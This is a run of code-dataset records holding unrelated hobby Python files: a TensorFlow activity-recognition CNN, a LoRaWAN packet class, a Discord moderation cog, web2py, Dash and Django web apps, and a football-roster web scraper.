np.reshape(Test_data,(2248,10,10,3))\nTest_labels = np.reshape(Test_labels,(2248,6))\n\ninput_height = 10\ninput_width = 10\nnum_labels = 6\nnum_channels = 3\n\nbatch_size = 10\nkernel_size = 60\ndepth = 60\nnum_hidden = 1000\n\nlearning_rate = 0.00001\ntraining_epochs = 10000\n\n#def CNN(input_tensor, train, regularizer):\ndef CNN(input_tensor, train):\n with tf.variable_scope('layer1-conv1'):\n conv1_weights = tf.get_variable(\"weight\",[3,3,3,60],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv1_biases = tf.get_variable(\"bias\",[60],initializer=tf.constant_initializer(0.0))\n conv1 = tf.nn.conv2d(input_tensor, conv1_weights, strides=[1,1,1,1],padding='SAME')\n relu1 = tf.nn.relu(tf.nn.bias_add(conv1, conv1_biases))\n with tf.name_scope('layer2-pool1'):\n pool1 = tf.nn.max_pool(relu1, ksize=[1,2,2,1],strides=[1,1,1,1],padding=\"SAME\")\n print(pool1.shape)\n with tf.variable_scope('layer3-conv2'):\n conv2_weights = tf.get_variable(\"weight\",[5,5,60,10],initializer=tf.truncated_normal_initializer(stddev=0.1))\n conv2_biases = tf.get_variable(\"bias\",[10],initializer=tf.constant_initializer(0.0))\n conv2 = tf.nn.conv2d(pool1, conv2_weights, strides=[1,1,1,1],padding='VALID')\n relu2 = tf.nn.relu(tf.nn.bias_add(conv2, conv2_biases))\n with tf.variable_scope('layer4-fc1'):\n pool_shape = relu2.get_shape().as_list()\n nodes = pool_shape[1] * pool_shape[2] * pool_shape[3]\n reshaped = tf.reshape(relu2, [-1, nodes])\n print(\"nodes:\", nodes)\n\n fc1_weights = tf.get_variable(\"weight\",[nodes,1000],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('loss', regularizer(fc1_weights))\n fc1_biases = tf.get_variable(\"bias\", [1000], initializer=tf.constant_initializer(0.1))\n fc1 = tf.nn.tanh(tf.matmul(reshaped, fc1_weights) + fc1_biases)\n if train:\n fc1 = tf.nn.dropout(fc1, 0.5)\n with tf.variable_scope('layer5-fc2'):\n fc2_weights = tf.get_variable(\"weight\", [1000,6],initializer=tf.truncated_normal_initializer(stddev=0.1))\n if regularizer != None:\n tf.add_to_collection('loss', regularizer(fc2_weights))\n fc2_biases = tf.get_variable(\"bias\", [6], initializer=tf.constant_initializer(0.1))\n logits = tf.nn.softmax(tf.matmul(fc1, fc2_weights) + fc2_biases)\n return logits\n\nX = tf.placeholder(tf.float32, shape=[None,input_height,input_width,num_channels])\nY = tf.placeholder(tf.float32, shape=[None,num_labels])\ntf.summary.image('input',Train_data, 20)\nregularizer = tf.contrib.layers.l2_regularizer(0.1)\ny_ = CNN(X,False)\n#loss = -tf.reduce_sum(Y*tf.log(y_))\nloss = tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=Y,logits=y_))\n#tf.summary.scalar('loss', loss)\n\n#loss = tf.nn.softmax_cross_entropy_with_logits(labels=Y,logits=y_)\n#global_step = tf.Variable(0)\n\n\n#loss=tf.reduce_mean(tf.reduce_sum(tf.square(y_ - Y)))\n#optimizer = tf.train.AdamOptimizer(learning_rate).minimize(loss)\n#learning_rate = tf.train.exponential_decay(0.01, global_step, 1, 0.9, staircase=True)\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate).minimize(loss)\ncorrect_prediction = tf.equal(tf.argmax(y_, 1), tf.argmax(Y, 1))\n\n\n\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntf.summary.scalar('accuracy', accuracy)\nwith tf.Session() as session:\n tf.initialize_all_variables().run()\n merged = tf.summary.merge_all()\n #train_writer = tf.summary.FileWriter('./train', session.graph)\n #test_writer = tf.summary.FileWriter('./test')\n for i in range(training_epochs):\n #start = (epoch * 60) % 6000\n #end = min(start+60, 6000)\n _, tra_, losss = session.run([optimizer, accuracy, loss], feed_dict={X: Train_data, Y: Train_labels})\n #train_writer.add_summary(summary, epoch)\n _, y_pred, testa = session.run([optimizer, y_, accuracy], feed_dict={X: Test_data, Y: Test_labels})\n #test_writer.add_summary(summary, epoch)\n if(i%10 ==0): \n y_pred = np.argmax(y_pred, 1)\n y_true = np.argmax(Test_labels, 1)\n C=confusion_matrix(y_true, y_pred)\n print(C)\n print(classification_report(y_true, y_pred))\n\n print (\"step %d, \\tTrain: %g, \\tTest: %g ce=%g.\"%(i, tra_, testa, losss))\n #print(\"Epoch: \", epoch, \"Loss:\", losss, \" Training Accuracy: \",tra_, \"Testing:\", testa)\n #print(\"Epoch: \", epoch, \" Training Accuracy: \",session.run(accuracy, feed_dict={X: Train_data, Y: Train_labels}))\n #print(\"Testing Accuracy:\", session.run(accuracy, feed_dict={X: Test_data, Y: Test_labels}))\n","sub_path":"WISDM_ar_v1.1/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":5170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"74841471","text":"import math\nfrom os import urandom\nfrom bitstring import Bits\nfrom FRCommon import FRModes as Modes\nfrom FRCommon import lsb_mask\nfrom FRCommon import take_field_from_fragment\nfrom FRTile import FRTile as Tile\nfrom FRProfile import FRProfile as Profile\nfrom uCRC32 import CRC32\n\n\nclass FRPacket:\n\n def __init__(self):\n self.packet = None\n self.tiles = []\n self.packet_padding = None\n self.last_tile_padding = None\n self.MIC = None\n return\n\n def set_packet(self, packet):\n self.packet = packet\n return\n\n def set_tiles(self, tiles):\n self.tiles = tiles.copy()\n return\n\n def get_packet(self):\n return self.packet\n\n def random_generate(self, length_in_bytes):\n self.packet = urandom(length_in_bytes)\n return\n\n def set_padding(self, bits):\n self.last_tile_padding = bits\n if bits == 0:\n self.packet_padding = bytes(0)\n else:\n self.packet_padding = bytes(1)\n\n def calculate_mic(self, profile):\n if profile.mic_algo == 'CRC32':\n self.MIC = CRC32().calc(self.packet + self.packet_padding)\n return\n\n def get_tiles(self, profile: Profile, tile_len: int):\n if profile.mode == Modes.NO_ACK:\n return self.no_ack_get_tiles(tile_len, profile.l2_word_size)\n elif profile.mode == Modes.ALWAYS_ACK:\n return self.always_ack_get_tiles(tile_len, profile.l2_word_size)\n elif profile.mode == Modes.ACK_ON_ERROR:\n return self.ack_on_error_get_tiles(tile_len, profile.penultimate_tile_smaller, profile.l2_word_size)\n\n def no_ack_get_tiles(self, tile_len, l2_size=8):\n return self.always_ack_get_tiles(tile_len, l2_size)\n\n def ack_on_error_get_tiles(self, tile_len, penultimate_tile_small=False, l2_size=8):\n return\n\n def always_ack_get_tiles(self, tile_len, l2_size=8):\n packet_bits = len(self.packet)*8\n max_tiles = 0\n # Get number of tiles\n if tile_len < l2_size:\n print(\"## Tile length must be equal or greater than L2 size word =\", l2_size)\n else:\n remainder_tile = 0\n if packet_bits % tile_len > 0:\n remainder_tile = 1\n max_tiles = math.floor(packet_bits / tile_len) + remainder_tile\n # Get tiles\n packet_bits_left = packet_bits\n all_tiles = []\n tile = None\n octet_bits_left = 8\n octet_index = 0\n while packet_bits_left > 0:\n tile, packet_bits_left, octet_index, octet_bits_left = take_field_from_fragment(tile_len,\n self.packet,\n packet_bits_left,\n octet_index,\n octet_bits_left)\n all_tiles.append(tile)\n if len(all_tiles) != max_tiles:\n print(\"## Error in number of Tiles created\")\n else:\n self.tiles = all_tiles\n print(\"## Tiles created\")\n return max_tiles\n\n def construct_from_tiles(self, all_tiles):\n tiles_number = len(all_tiles)\n packet = Bits(0)\n for tiles_index in range(0, tiles_number):\n packet = packet + all_tiles[tiles_index].get_bits()\n self.packet = packet.tobytes()\n self.tiles = all_tiles\n return\n\n def add_window_to_packet(self, window):\n index = len(window) - 1\n while index >= 0:\n if window[index] is not None:\n self.tiles.append(window[index])\n index -= 1\n return\n\n","sub_path":"LoRaWAN_Fragmentation/FRPacket.py","file_name":"FRPacket.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"613146770","text":"\"\"\"\nMIT License\nCopyright (c) 2020 GamingGeek\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software\nand associated documentation files (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,\nand/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE\nFOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\nWITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n\nfrom discord.ext import commands\nfrom contextlib import suppress\nimport functools\nimport traceback\nimport asyncio\nimport discord\nimport re\n\n\nclass Message(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.raidmsgs = {}\n self.msgraiders = {}\n self.dupecheck = {}\n self.uuidregex = r\"[a-f0-9]{8}-?[a-f0-9]{4}-?4[a-f0-9]{3}-?[89ab][a-f0-9]{3}-?[a-f0-9]{12}\"\n\n def uuidgobyebye(self, text: str):\n return re.sub(self.uuidregex, '', text, 0, re.MULTILINE)\n\n async def safe_exc(self, coro, *args, **kwargs):\n try:\n await coro(*args, **kwargs)\n except Exception:\n pass\n\n @commands.Cog.listener()\n async def on_message(self, message):\n if not isinstance(message.author, discord.Member):\n return\n if message.author.bot:\n return\n if self.bot.configs[message.guild.id].get('mod.dupecheck'):\n lastmsg = self.uuidgobyebye(self.dupecheck.get(message.author.id, 'send this message and it will get yeeted'))\n thismsg = self.uuidgobyebye(message.content)\n excluded = self.bot.configs[message.guild.id].get('excluded.filter')\n roleids = [r.id for r in message.author.roles]\n if message.author.id not in excluded and not any(r in excluded for r in roleids) and message.channel.id not in excluded:\n if message.content != \"\" and len(message.attachments) < 1 and not message.author.bot:\n if thismsg == lastmsg and not message.author.permissions_in(message.channel).manage_messages:\n await message.delete()\n self.dupecheck[message.author.id] = message.content\n premium = self.bot.premiumGuilds\n if message.guild and message.guild.id in premium:\n raidmsg = self.raidmsgs.get(message.guild.id, False)\n if raidmsg and raidmsg in message.content:\n self.msgraiders.get(message.guild.id, []).append(message.author)\n excluded = self.bot.configs[message.guild.id].get('excluded.filter')\n roleids = [r.id for r in message.author.roles]\n if message.author.id not in excluded and not any(r in excluded for r in roleids) and message.channel.id not in excluded:\n filters = self.bot.get_cog('Filters')\n # with suppress(Exception):\n await self.safe_exc(filters.handle_invite, message)\n await self.safe_exc(filters.anti_malware, message)\n await self.safe_exc(filters.handle_paypal, message)\n await self.safe_exc(filters.handle_youtube, message)\n await self.safe_exc(filters.handle_twitch, message)\n await self.safe_exc(filters.handle_twitter, message)\n\n\ndef setup(bot):\n try:\n bot.add_cog(Message(bot))\n bot.logger.info(f'$GREENLoaded event $BLUEMessage!')\n except Exception as e:\n # errortb = ''.join(traceback.format_exception(type(e), e, e.__traceback__))\n bot.logger.error(f'$REDError while loading event $BLUE\"Message\"', exc_info=e)\n","sub_path":"events/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"27372627","text":"# -*- coding: utf-8 -*-\n\n#########################################################################\n## This scaffolding model makes your app work on Google App Engine too\n## File is released under public domain and you can use without limitations\n#########################################################################\n\n## if SSL/HTTPS is properly configured and you want all HTTP requests to\n## be redirected to HTTPS, uncomment the line below:\n# request.requires_https()\n\nif not request.env.web2py_runtime_gae:\n ## if NOT running on Google App Engine use SQLite or other DB\n db = DAL('sqlite://storage.sqlite',pool_size=1,check_reserved=['all'])\nelse:\n ## connect to Google BigTable (optional 'google:datastore://namespace')\n db = DAL('google:datastore')\n from google.appengine.api import memcache\n\n ## store sessions and tickets there\n session.connect(request, response, db=db)\n ## or store session in Memcache, Redis, etc.\n ## from gluon.contrib.memdb import MEMDB\n ## from google.appengine.api.memcache import Client\n ## session.connect(request, response, db = MEMDB(Client()))\n\n## by default give a view/generic.extension to all actions from localhost\n## none otherwise. a pattern can be 'controller/function.extension'\nresponse.generic_patterns = ['*'] if request.is_local else []\n## (optional) optimize handling of static files\n# response.optimize_css = 'concat,minify,inline'\n# response.optimize_js = 'concat,minify,inline'\n\n#########################################################################\n## Here is sample code if you need for\n## - email capabilities\n## - authentication (registration, login, logout, ... )\n## - authorization (role based authorization)\n## - services (xml, csv, json, xmlrpc, jsonrpc, amf, rss)\n## - old style crud actions\n## (more options discussed in gluon/tools.py)\n#########################################################################\n\nfrom gluon.tools import Auth, Crud, Service, PluginManager, prettydate\nauth = Auth(db)\nauth.settings.extra_fields['auth_user']= [\n Field('myQuestion_num', 'integer', default=0, readable=False, writable=False),\n Field('myQuestion_list', 'list:integer', readable=False, writable=False),\n Field('myReply_num', 'integer', default=0, readable=False, writable=False),\n Field('myReply_list', 'list:integer', readable=False, writable=False)\n]\n\ncrud, service, plugins = Crud(db), Service(), PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\n\n## configure email\nmail = auth.settings.mailer\nmail.settings.server = 'gae'\nmail.settings.sender = 'info.pbsn@gmail.com'\nmail.settings.login = 'username:password'\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n## if you need to use OpenID, Facebook, MySpace, Twitter, Linkedin, etc.\n## register with janrain.com, write your domain:api_key in private/janrain.key\nfrom gluon.contrib.login_methods.rpx_account import use_janrain\nuse_janrain(auth, filename='private/janrain.key')\n\n#########################################################################\n## Define your tables below (or better in another model file) for example\n##\n## >>> db.define_table('mytable',Field('myfield','string'))\n##\n## Fields can be 'string','text','password','integer','double','boolean'\n## 'date','time','datetime','blob','upload', 'reference TABLENAME'\n## There is an implicit 'id integer autoincrement' field\n## Consult manual for more options, validators, etc.\n##\n## More API examples for controllers:\n##\n## >>> db.mytable.insert(myfield='value')\n## >>> rows=db(db.mytable.myfield=='value').select(db.mytable.ALL)\n## >>> for row in rows: print row.id, row.myfield\n#########################################################################\n\ndb.define_table('kjv',\n Field('vno', 'integer', readable=False, writable=False),\n Field('book', 'string', length=12, readable=False, writable=False),\n Field('chapter', 'integer', readable=False, writable=False),\n Field('verse', 'integer', readable=False, writable=False),\n Field('text', 'text', requires=IS_LENGTH(1028), readable=False, writable=False))\n\ndb.define_table('question',\n Field('vno', 'integer', readable=False, writable=False),\n Field('body', 'text', requires=IS_NOT_EMPTY(), label='Please share your question about this verse (up to 2000 letters)'),\n Field('posted_on', 'datetime', readable=False, writable=False),\n Field('posted_by', 'reference auth_user', readable=False, writable=False),\n Field(\"question_no\", 'integer', default=0, readable=False, writable=False),\n Field(\"myQuestion_no\", 'integer', default=0, readable=False, writable=False),\n Field(\"finish_flag\", 'integer', default=0, readable=False, writable=False),\n Field(\"delete_flag\", 'integer', default=0, readable=False, writable=False))\n\ndb.define_table('reply',\n Field('question', 'reference question', readable=False, writable=False),\n Field('body', 'text', requires=IS_NOT_EMPTY(), label='Please share your question about this verse (up to 2000 letters)'),\n Field('posted_on', 'datetime', readable=False, writable=False),\n Field('posted_by', 'reference auth_user', readable=False, writable=False),\n Field(\"myReply_no\", 'integer', default=0, readable=False, writable=False),\n Field(\"finish_flag\", 'integer', default=0, readable=False, writable=False),\n Field(\"delete_flag\", 'integer', default=0, readable=False, writable=False))\n\ndb.define_table('info',\n Field(\"info_name\", 'string', readable=False, writable=False),\n Field(\"value\", 'integer', default=0, readable=False, writable=False),\n Field('list', 'list:integer', readable=False, writable=False))\n\na = db(db.info.info_name == \"total_question\").select() \nif len(a) == 0: init_info = db.info.validate_and_insert(info_name=\"total_question\", value=0) \n \ndef name_of(user): return '%(first_name)s %(last_name)s' % user\n \n## after defining tables, uncomment below to enable auditing\nauth.enable_record_versioning(db)\n\nKJV = db.kjv\nUser = db.auth_user\nQuestion = db.question\nReply = db.reply\nInfo = db.info\nme, a0, a1 = auth.user_id, request.args(0), request.args(1)\n\nbooks = {\n'Gen':'Genesis',\n'Exo':'Exodus',\n'Lev':'Leviticus',\n'Num':'Numbers',\n'Deu':'Deuteronomy',\n'Jos':'Joshua',\n'Jdg':'Judges',\n'Rut':'Ruth',\n'Sa1':'1 Samuel',\n'Sa2':'2 Samuel',\n'Kg1':'1 Kings',\n'Kg2':'2 Kings',\n'Ch1':'1 Chronicles',\n'Ch2':'2 Chronicles',\n'Ezr':'Ezra',\n'Neh':'Nehemiah',\n'Est':'Esther',\n'Job':'Job',\n'Psa':'Psalm',\n'Pro':'Proverbs',\n'Ecc':'Ecclesiastes',\n'Sol':'Song of Solomon',\n'Isa':'Isaiah',\n'Jer':'Jeremiah',\n'Lam':'Lamentations',\n'Eze':'Ezekiel',\n'Dan':'Daniel',\n'Hos':'Hosea',\n'Joe':'Joel',\n'Amo':'Amos',\n'Oba':'Obadiah',\n'Jon':'Jonah',\n'Mic':'Micah',\n'Nah':'Nahum',\n'Hab':'Habakkuk',\n'Zep':'Zephaniah',\n'Hag':'Haggai',\n'Zac':'Zechariah',\n'Mal':'Malachi ',\n'Mat':'Matthew',\n'Mar':'Mark',\n'Luk':'Luke',\n'Joh':'John',\n'Act':'Acts',\n'Rom':'Romans',\n'Co1':'1 Corinthians',\n'Co2':'2 Corinthians',\n'Gal':'Galatians',\n'Eph':'Ephesians',\n'Phi':'Philippians',\n'Col':'Colossians',\n'Th1':'1 Thessalonians',\n'Th2':'2 Thessalonians',\n'Ti1':'1 Timothy',\n'Ti2':'2 Timothy',\n'Tit':'Titus',\n'Plm':'Philemon',\n'Heb':'Hebrews',\n'Jam':'James',\n'Pe1':'1 Peter',\n'Pe2':'2 Peter',\n'Jo1':'1 John',\n'Jo2':'2 John',\n'Jo3':'3 John',\n'Jde':'Jude',\n'Rev':'Revelation'}\n\nbooks2 = {\n'Genesis':'Gen',\n'Exodus':'Exo',\n'Leviticus':'Lev',\n'Numbers':'Num',\n'Deuteronomy':'Deu',\n'Joshua':'Jos',\n'Judges':'Jdg',\n'Ruth':'Rut',\n'1 Samuel':'Sa1',\n'2 Samuel':'Sa2',\n'1 Kings':'Kg1',\n'2 Kings':'Kg2',\n'1 Chronicles':'Ch1',\n'2 Chronicles':'Ch2',\n'Ezra':'Ezr',\n'Nehemiah':'Neh',\n'Esther':'Est',\n'Job':'Job',\n'Psalm':'Psa',\n'Proverbs':'Pro',\n'Ecclesiastes':'Ecc',\n'Song of Solomon':'Sol',\n'Isaiah':'Isa',\n'Jeremiah':'Jer',\n'Lamentations':'Lam',\n'Ezekiel':'Eze',\n'Daniel':'Dan',\n'Hosea':'Hos',\n'Joel':'Joe',\n'Amos':'Amo',\n'Obadiah':'Oba',\n'Jonah':'Jon',\n'Micah':'Mic',\n'Nahum':'Nah',\n'Habakkuk':'Hab',\n'Zephaniah':'Zep',\n'Haggai':'Hag',\n'Zechariah':'Zac',\n'Malachi ':'Mal',\n'Matthew':'Mat',\n'Mark':'Mar',\n'Luke':'Luk',\n'John':'Joh',\n'Acts':'Act',\n'Romans':'Rom',\n'1 Corinthians':'Co1',\n'2 Corinthians':'Co2',\n'Galatians':'Gal',\n'Ephesians':'Eph',\n'Philippians':'Phi',\n'Colossians':'Col',\n'1 Thessalonians':'Th1',\n'2 Thessalonians':'Th2',\n'1 Timothy':'Ti1',\n'2 Timothy':'Ti2',\n'Titus':'Tit',\n'Philemon':'Plm',\n'Hebrews':'Heb',\n'James':'Jam',\n'1 Peter':'Pe1',\n'2 Peter':'Pe2',\n'1 John':'Jo1',\n'2 John':'Jo2',\n'3 John':'Jo3',\n'Jude':'Jde',\n'Revelation':'Rev'}","sub_path":"original files/Python code/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":8633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"1427345","text":"from PIL import Image\r\n\r\n \r\n\r\n# Create an Image object from an Image\r\n\r\ncolorImage = Image.open(\"./test (16).jpg\")\r\n\r\n \r\n\r\n# Rotate it by 45 degrees\r\n\r\nrotated = colorImage.rotate(45)\r\n\r\ncolorImage.show()\r\n\r\nrotated.show()\r\n","sub_path":"rotate.py","file_name":"rotate.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"84587916","text":"# -*- coding: utf-8 -*-\n\nfrom dash import Dash\nfrom dash.dependencies import Input, Output, ALL, State, MATCH, ALLSMALLER, ClientsideFunction\nfrom Dashapps.Dash_fun import apply_layout_with_auth, load_object, save_object\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\n# https://github.com/plotly/dash-daq\n#https://dash-docs.herokuapp.com/dash-daq\nimport dash_daq as daq\nimport pandas as pd\nimport plotly.express as px\nimport plotly.graph_objs as go\nfrom Dashapps.Dash_base import warning_card, colors, cite_card, description_card, hint_card\nimport dash_table\nfrom datetime import datetime\nimport numpy as np\nfrom flask import request\nimport locale\n\nurl_base = '/dash/app17/' \n\ndata_sources = [\n \"https://www.kaggle.com/prateekmaj21/disney-movies\"\n]\n\ndata_licenses = [\n]\n\nsourced_date = \"05/17/2021\"\n\ncite_text = '\"All our dreams can come true — if we have the courage to pursue them.\"'\ncite_author = \"Walt Disney\"\ncite_link = \"https://en.wikipedia.org/wiki/Walt_Disney\"\ndescription_text = '''On this chart you see the Top 20 Disney Movies based on their gross return in dollar, which is adjusted by the inflation. For me the order was quite suprising. For you as well?'''\nhint_text = \"\"\ndf = pd.read_csv('app_data/processed/0017.csv')\ndf = df.sort_values('inflation_adjusted_gross', ascending=False)\ndf = df.head(20)\n\nfig = px.bar(df, y=\"movie_title\", x=\"inflation_adjusted_gross\", title=\"Top 20 Disney Movies with the highest gross return (inflation adjusted) \", labels={\"movie_title\": \"Movie Title\", \"inflation_adjusted_gross\": \"Gross Return (inf. adj.)\"})\nfig['layout']['yaxis']['autorange'] = \"reversed\"\nfig.update_layout( legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1.02,\n xanchor=\"right\",\n x=1\n), \n annotations=[\n dict(\n textangle=-30,\n opacity=0.1,\n font=dict(color=\"black\", size=35),\n xref=\"paper\",\n yref=\"paper\",\n x=0.5,\n y=0.5,\n showarrow=False,\n text=\"www.blackandwhitedata.com\",\n )\n ],\n height=800,\n margin={'r': 4,'l':10},yaxis={'visible': True})\n\n\n# The Layout\nlayout = html.Div(style={'font-family':'\"Poppins\", sans-serif', 'backgroundColor': colors['background']}, children=[\n html.H1(\n children='Gross Return of Disney Movies',\n style={\n 'textAlign': 'center',\n 'color': colors['text'],\n 'backgroundColor': colors['background']\n }\n ),\n html.Div(children=description_card(description_text), style={\n 'textAlign': 'center',\n 'color': colors['text'],\n 'backgroundColor': colors['background']\n }),\n html.Div(children=cite_card(cite_text,cite_author,cite_link), style={\n 'textAlign': 'center',\n 'color': colors['text'],\n 'backgroundColor': colors['background']\n }),\n html.Br(),\n dcc.Graph(\n id='example-graph-2',\n figure=fig\n ),\n html.Br(),\n html.Div(children=hint_card(hint_text), style={\n 'textAlign': 'left',\n 'color': colors['text'],\n 'backgroundColor': colors['background']\n }),\n #add fig here\n html.Br(),\n html.Hr(className=\"my-2\"),\n html.Br(),\n html.Div(children=warning_card(data_sources,data_licenses,sourced_date), style={\n 'textAlign': 'left',\n 'color': colors['text'],\n 'backgroundColor': colors['background']\n })\n])\n\ndef Add_Dash(server):\n app = Dash(server=server, url_base_pathname=url_base, external_stylesheets = [dbc.themes.BOOTSTRAP], external_scripts = [\"https://cdn.plot.ly/plotly-locale-de-latest.js\"], meta_tags=[{\"name\": \"viewport\", \"content\": \"width=device-width, initial-scale=1\"}])\n \n apply_layout_with_auth(app, layout)\n\n return app.server","sub_path":"flask/Dashapps/entertain/Dash_App17.py","file_name":"Dash_App17.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"577133669","text":"from django import template\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import RequestContext\nfrom django.shortcuts import render, get_object_or_404, get_list_or_404, redirect, render_to_response\nfrom django.views.generic import View\nfrom django.views.generic.edit import FormView\nfrom .forms import *\nfrom .models import *\n\n\n# HTTP Error 404\n# def page_not_found(request):\n# response = render_to_response(\n# '404.html',\n# context_instance=RequestContext(request)\n# )\n#\n# response.status_code = 404\n#\n# return response\n\nclass About(FormView):\n template_name = 'about.html'\n form_class = ReistrationForm\n success_url = \"/index\"\n\n def get_context_data(self, **kwargs):\n context = super(About, self).get_context_data(**kwargs)\n KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n Username = self.request.user\n context['ETags'] = EtelaTags\n context['KTags'] = KasbTags\n context['STags'] = ShaTags\n context['KhTags'] = KhaTags\n context['username'] = Username\n return context\n\n def form_valid(self, form):\n form.save()\n return super(About, self).form_valid(form)\n\n\nclass Index(About):\n template_name = 'index.html'\n webcontext = Webpage.objects.all()\n\n def get_context_data(self, **kwargs):\n context = super(Index, self).get_context_data(**kwargs)\n webcontext = Webpage.objects.all()\n context['webcontext'] = webcontext\n return context\n\n\nclass Categorys(About):\n template_name = \"all-Category.html\"\n\n\nclass SiteMap(About):\n template_name = \"siteMap.html\"\n\n\nclass Questions(About):\n template_name = \"Questions.html\"\n\n\nclass Contact(About):\n template_name = \"contact.html\"\n\n\nclass Vision(About):\n template_name = \"Vision.html\"\n\n\ndef Contact2(request):\n if request.method == \"GET\":\n return HttpResponse(\"ERROR\")\n name = request.POST.get('name')\n email = request.POST.get('email')\n message = request.POST.get('message')\n form = Contact(name=name, email=email, message=message)\n contact = form.save()\n return render(request, 'contact.html')\n\n\n\n\n\ndef ShowWebsites(request, web=\"1\"):\n form = ReistrationForm(request.POST or None)\n if form.is_valid():\n form.save(commit=False)\n webcontext = Webpage.objects.filter(Sub__id=web)\n Sub = SubCategory.objects.filter(id=web)\n KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n Username = request.user\n\n context = {\"webcontext\": webcontext, 'form': form, \"ETags\": EtelaTags, 'KTags': KasbTags, 'STags': ShaTags,\n 'KhTags': KhaTags, \"username\": Username, \"sub\": Sub}\n return render(request, 'showWebsites.html', context)\n\n\ndef Websitepage(request, webtitle=\"1\"):\n form = ReistrationForm(request.POST or None)\n if form.is_valid():\n form.save(commit=False)\n Username = request.user\n webcontext = get_object_or_404(Webpage, id=webtitle)\n Fescontext = Festival.objects.filter(webpage=webcontext.id)\n KasbTags = SubCategory.objects.filter(category__category_name=\"کسب وکارهای آنلاین\")\n EtelaTags = SubCategory.objects.filter(category__category_name=\"اطلاع رسانی و محتوا\")\n ShaTags = SubCategory.objects.filter(category__category_name=\"شخصی و شرکتی\")\n KhaTags = SubCategory.objects.filter(category__category_name=\"خدمات آنلاین\")\n Tags = webcontext.Sub.all()\n context = {\"webcontext\": webcontext, \"Fescontext\": Fescontext, \"Tags\": Tags, 'form': form, \"username\": Username,\n \"ETags\": EtelaTags, 'KTags': KasbTags, 'STags': ShaTags,\n 'KhTags': KhaTags}\n return render(request, 'Websitepage.html', context)\n","sub_path":"WebCastle/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"444823673","text":"import urllib\nimport pandas as pd\n\nurl_team = 'https://www.fieldlevel.com/explore-teams/football/va?page='\nuser_agent = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\nheaders={'User-Agent':user_agent,}\n \nstorage_teams = pd.DataFrame(columns = {\"Name\", \"Region\", \"Type\"})\nstore = [] \nindex = 0;\n \nfor x in range(1,11): \n new_url = url_team + str(x)\n req = urllib.request.Request(new_url, None, headers)\n page = urllib.request.urlopen(req)\n data = page.read().decode('utf-8')\n for table in data.split(''):\n if \"'):\n if \"\",\"\").replace(\"<\",\"\").replace(\"/\",\"\").split(\"td\")\n no = item[0].replace('\"',\"\")\n name = item[2].split('\"')[2]\n pos = item[4]\n ht = item[6]\n wt = item[8]\n cla = item[10]\n home = item[12].split(\",\")[0]\n state = item[12].split(\",\")[1].replace(\" \",\"\")\n storage_uva.loc[index] = [no, name, pos, ht, wt, cla, home, state]\n index = index + 1\n \n \nwriter_uva = pd.ExcelWriter('uva.xlsx')\nstorage_uva.to_excel(writer_uva, 'Sheet1') 